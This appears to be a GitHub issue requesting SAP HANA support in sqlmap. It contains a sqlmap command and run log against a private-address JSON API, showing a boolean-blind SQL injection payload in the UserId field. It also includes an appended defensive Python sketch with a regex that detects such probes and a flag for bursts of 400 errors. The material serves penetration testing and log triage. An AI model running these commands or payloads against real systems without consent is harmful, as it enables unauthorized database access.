Description
Hey sqlmap team,
First off, thanks for creating and maintaining such an amazing tool. It's an essential part of my toolkit.
I'm writing to suggest adding support for the SAP HANA database. It's popping up more and more in enterprise environments I test, and I've noticed that sqlmap currently struggles to identify it. This usually means having to switch to time-consuming manual testing, which is a shame when we're so close to automating it.
It would be incredible to have full support, including the ability to properly fingerprint HANA, use the standard injection techniques (boolean, time-based, UNION, etc.), and of course, enumerate and dump data.
I actually ran into this exact problem recently. The log below shows a perfect example: sqlmap correctly finds a boolean-based blind injection point, but then stalls because it can't identify the backend DBMS, which was SAP HANA. It got so close!
```
sqlmap -u "https://10.10.10.13:9001/api/UserDetails" --data '{"UserId": "ABC001"}' --random-agent --dbms="SAP MaxDB" --flush-session
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.8#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:02:18 /2025-09-06/

[00:02:19] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.5+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
JSON data found in POST body. Do you want to process it? [Y/n/q]
[00:02:20] [INFO] flushing session file
[00:02:20] [INFO] testing connection to the target URL
[00:02:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:02:22] [INFO] testing if the target URL content is stable
[00:02:22] [INFO] target URL content is stable
[00:02:22] [INFO] testing if (custom) POST parameter 'JSON UserId' is dynamic
[00:02:23] [WARNING] (custom) POST parameter 'JSON UserId' does not appear to be dynamic
[00:02:23] [INFO] heuristic (basic) test shows that (custom) POST parameter 'JSON UserId' might be injectable
[00:02:24] [INFO] testing for SQL injection on (custom) POST parameter 'JSON UserId'
[00:02:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:02:29] [INFO] (custom) POST parameter 'JSON UserId' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --code=200)
[00:02:29] [INFO] testing 'Generic inline queries'
[00:02:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:02:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:02:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:02:32] [INFO] target URL appears to have 5 columns in query
[00:02:32] [WARNING] applying generic concatenation (CONCAT)
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] N
[00:02:49] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1')
[00:02:59] [INFO] checking if the injection point on (custom) POST parameter 'JSON UserId' is a false positive
(custom) POST parameter 'JSON UserId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 63 HTTP(s) requests:
Parameter: JSON UserId ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: {"UserId": "ABC001' AND 1285=1285 AND 'RHcm'='RHcm"}
[00:03:05] [INFO] testing SAP MaxDB
[00:03:05] [WARNING] the back-end DBMS is not SAP MaxDB
[00:03:05] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
[00:03:05] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 59 times

[*] ending @ 00:03:05 /2025-09-06/
```
Adding native support for HANA would be a huge help for pentesters working in corporate environments.
Thanks for your time and for considering this. Keep up the fantastic work!
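
Seen from the API side, the run logged in this issue leaves two traces: JSON string values that break out of a quote into a literal-to-literal comparison (the reported payload), and a burst of 400 responses to a single client (59 of 63 requests). The sketch below checks request records for both. It is an added example, not part of the original issue and not sqlmap code; the record layout, thresholds, and client addresses are assumptions.

```python
import json
import re
from collections import Counter

# A quote break followed by a literal-vs-literal comparison, as in the payload
# from the report: ABC001' AND 1285=1285 AND 'RHcm'='RHcm
LITERAL_CMP = re.compile(r"'\s*(?:AND|OR)\s+(?:\d+\s*=\s*\d+|'\w*'\s*=\s*'\w*)", re.I)

def string_values(node):
    """Yield every string value found anywhere in a decoded JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, (dict, list)):
        for child in (node.values() if isinstance(node, dict) else node):
            yield from string_values(child)

def body_is_suspicious(body):
    """True if any JSON string value contains a boolean-probe comparison."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False  # not JSON; outside the scope of this check
    return any(LITERAL_CMP.search(s) for s in string_values(doc))

def review(records, min_requests=5, error_ratio=0.8):
    """records: iterable of (client, status, body). Returns {client: [reasons]}.
    min_requests and error_ratio are assumed thresholds; tune them per API."""
    total, errors, hits = Counter(), Counter(), Counter()
    for client, status, body in records:
        total[client] += 1
        errors[client] += status == 400
        hits[client] += body_is_suspicious(body)
    findings = {}
    for client, n in total.items():
        reasons = []
        if hits[client]:
            reasons.append("boolean-probe")
        if n >= min_requests and errors[client] / n >= error_ratio:
            reasons.append("error-burst")
        if reasons:
            findings[client] = reasons
    return findings

# Constructed sample records (client, HTTP status, JSON body); addresses are
# from the documentation range and do not come from the report.
SAMPLE = [
    ("192.0.2.5", 200, '{"UserId": "ABC001"}'),
    ("192.0.2.9", 200, '{"UserId": "ABC001\' AND 1285=1285 AND \'RHcm\'=\'RHcm"}'),
] + [("192.0.2.9", 400, '{"UserId": "ABC001\' AND 1285=%d AND \'RHcm\'=\'RHcm"}' % i)
     for i in range(8)]
```

`review(SAMPLE)` flags only the second client, for both reasons. Pattern matching of this kind helps triage logs; the fix for the endpoint itself is a parameterized query.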